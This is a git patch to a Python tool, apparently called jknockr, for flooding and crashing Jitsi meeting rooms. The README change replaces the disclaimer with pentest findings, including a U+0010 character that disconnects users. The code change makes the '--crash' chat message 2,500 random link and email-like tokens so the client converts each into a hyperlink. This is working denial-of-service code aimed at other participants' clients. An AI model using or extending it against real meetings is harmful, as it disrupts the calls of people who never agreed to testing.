From 29ecb16fdc07cf9c3c4b028f4c400c452aa69983 Mon Sep 17 00:00:00 2001 From: acidvegas Date: Sat, 12 Oct 2024 22:50:35 -0400 Subject: [PATCH] Added interesting finds when pentesting Jitsi and added mailto link usage in --crash --- README.md | 7 ++++--- jknockr.py | 4 ++-- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 41ffa23..78b8f49 100644 --- a/README.md +++ b/README.md @@ -72,9 +72,10 @@ python3 jknockr.py [options] - **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing. - **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service. -## Disclaimer - -The developer provides this script "as is" without any warranties. Use it at your own risk. The developer is not responsible for any damage or misuse of this script. +## Interesting Finds +- Sending a [U+0010](https://unicode-explorer.com/c/0010) character disconnects you from the room. Same with using as your name. +- Unicode in a URL is converted to puny code. *(`𓆨.中国` only 4 characters you send to the chat & itll convert to `xn--907d.xn--fiqs8s`)* +- Using @ in a URL converts it to a `mailto://` ___ diff --git a/jknockr.py b/jknockr.py index a76ffdc..0ede95e 100644 --- a/jknockr.py +++ b/jknockr.py @@ -155,7 +155,7 @@ def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id: if not tlds: print(f'Client {client_id}: TLD list is empty. Using default TLDs.') tlds = ['com', 'net', 'org', 'info', 'io'] - msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(2500)) + msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500)) elif args.message: msg = args.message message_body = f''' @@ -267,4 +267,4 @@ def random_word(length: int) -> str: if __name__ == '__main__': force_ipv4() - main() \ No newline at end of file + main()